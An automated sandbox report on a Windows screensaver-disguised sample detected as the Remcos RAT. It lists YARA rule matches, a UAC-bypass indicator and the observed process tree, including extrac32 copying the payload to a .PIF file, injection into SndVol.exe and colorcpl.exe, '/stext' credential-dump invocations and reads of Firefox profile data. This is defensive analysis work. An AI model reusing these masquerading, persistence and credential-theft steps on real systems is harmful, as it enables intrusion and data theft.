Source: 13.2.colorcpl.exe.6f80000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 13.2.colorcpl.exe.6f80000.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 13.2.colorcpl.exe.6f80000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 3.2.SndVol.exe.5350000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 3.2.SndVol.exe.5350000.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 3.2.SndVol.exe.5350000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 3.2.SndVol.exe.53518cd.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 3.2.SndVol.exe.53518cd.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 3.2.SndVol.exe.53518cd.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 13.2.colorcpl.exe.6f818cd.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 13.2.colorcpl.exe.6f818cd.2.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 13.2.colorcpl.exe.6f818cd.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 13.2.colorcpl.exe.6f818cd.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 13.2.colorcpl.exe.6f818cd.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 13.2.colorcpl.exe.6f818cd.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 3.2.SndVol.exe.53518cd.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 3.2.SndVol.exe.53518cd.2.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 3.2.SndVol.exe.53518cd.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 3.2.SndVol.exe.5350000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 3.2.SndVol.exe.5350000.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 3.2.SndVol.exe.5350000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 3.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 3.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 3.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 13.2.colorcpl.exe.6f80000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 13.2.colorcpl.exe.6f80000.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 13.2.colorcpl.exe.6f80000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 13.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 13.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 13.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0000000D.00000002.2251885365.0000000006F80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000D.00000002.2251885365.0000000006F80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000000D.00000002.2251885365.0000000006F80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0000000D.00000002.2247045059.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000D.00000002.2247045059.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000000D.00000002.2247045059.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: Process Memory Space: SndVol.exe PID: 6352, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: colorcpl.exe PID: 5900, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.rans.phis.troj.spyw.expl.evad.winEXE@21/6@3/3

Source: C:\Windows\SysWOW64\SndVol.exe

Code function: 4_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z,

4_2_004182CE

Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,		3_2_00417952
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_0536861F GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,		3_2_0536861F

Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe

Code function: 0_2_02907F4A GetDiskFreeSpaceA,

0_2_02907F4A

Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe

Code function: 0_2_0291A12C CreateToolhelp32Snapshot,

0_2_0291A12C

Source: C:\Windows\SysWOW64\SndVol.exe

Code function: 3_2_0041B4A8 FindResourceA,LoadResource,LockResource,SizeofResource,

3_2_0041B4A8

Source: C:\Windows\SysWOW64\SndVol.exe

Code function: 3_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

3_2_0041AA4A

Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe

File created: C:\Users\Public\Jsqwmpul.url

Jump to behavior

Source: C:\Windows\SysWOW64\SndVol.exe	Mutant created: \Sessions\1\BaseNamedObjects\Windows Volume App Window
Source: C:\Windows\SysWOW64\SndVol.exe	Mutant created: \Sessions\1\BaseNamedObjects\Rmc-TLPQMO

Source: C:\Windows\SysWOW64\SndVol.exe

File created: C:\Users\user\AppData\Local\Temp\bhv3259.tmp

Jump to behavior

Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Windows\SysWOW64\SndVol.exe

System information queried: HandleInformation

Jump to behavior

Source: C:\Windows\SysWOW64\SndVol.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: SndVol.exe, SndVol.exe, 00000004.00000002.2047662271.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: SndVol.exe, SndVol.exe, 00000007.00000002.2029658466.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: SndVol.exe, 00000003.00000002.4420280091.000000001F0E0000.00000040.10000000.00040000.00000000.sdmp, SndVol.exe, 00000004.00000002.2047662271.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: SndVol.exe, SndVol.exe, 00000004.00000002.2047662271.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: SndVol.exe, SndVol.exe, 00000004.00000002.2047662271.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: SndVol.exe, SndVol.exe, 00000004.00000002.2047662271.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: SndVol.exe, 00000004.00000003.2047281585.00000000031FD000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000004.00000002.2048056679.00000000031FE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: SndVol.exe, SndVol.exe, 00000004.00000002.2047662271.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: HGTQP09643009.scr.exe	ReversingLabs: Detection: 60%
Source: HGTQP09643009.scr.exe	Virustotal: Detection: 60%

Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe

File read: C:\Users\user\Desktop\HGTQP09643009.scr.exe

Jump to behavior

Source: C:\Windows\SysWOW64\SndVol.exe

Evasive API call chain: __getmainargs,DecisionNodes,exit

Source: unknown	Process created: C:\Users\user\Desktop\HGTQP09643009.scr.exe "C:\Users\user\Desktop\HGTQP09643009.scr.exe"
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Process created: C:\Windows\SysWOW64\extrac32.exe C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\Desktop\HGTQP09643009.scr.exe C:\\Users\\Public\\Libraries\\Jsqwmpul.PIF
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
Source: C:\Windows\SysWOW64\SndVol.exe	Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\user\AppData\Local\Temp\xkjscr"
Source: C:\Windows\SysWOW64\SndVol.exe	Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\user\AppData\Local\Temp\hfwldkaiv"
Source: C:\Windows\SysWOW64\SndVol.exe	Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\user\AppData\Local\Temp\hfwldkaiv"
Source: C:\Windows\SysWOW64\SndVol.exe	Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\user\AppData\Local\Temp\hfwldkaiv"
Source: C:\Windows\SysWOW64\SndVol.exe	Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\user\AppData\Local\Temp\jhbdectkjqlx"
Source: unknown	Process created: C:\Users\Public\Libraries\Jsqwmpul.PIF "C:\Users\Public\Libraries\Jsqwmpul.PIF"
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
Source: C:\Windows\SysWOW64\SndVol.exe	Process created: C:\Users\Public\Libraries\Jsqwmpul.PIF "C:\Users\Public\Libraries\Jsqwmpul.PIF"
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Process created: C:\Windows\SysWOW64\extrac32.exe C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\Desktop\HGTQP09643009.scr.exe C:\\Users\\Public\\Libraries\\Jsqwmpul.PIF	Jump to behavior
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe	Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe	Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\user\AppData\Local\Temp\xkjscr"	Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe	Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\user\AppData\Local\Temp\hfwldkaiv"	Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe	Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\user\AppData\Local\Temp\hfwldkaiv"	Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe	Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\user\AppData\Local\Temp\hfwldkaiv"	Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe	Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\user\AppData\Local\Temp\jhbdectkjqlx"	Jump to behavior
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe	Jump to behavior
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe

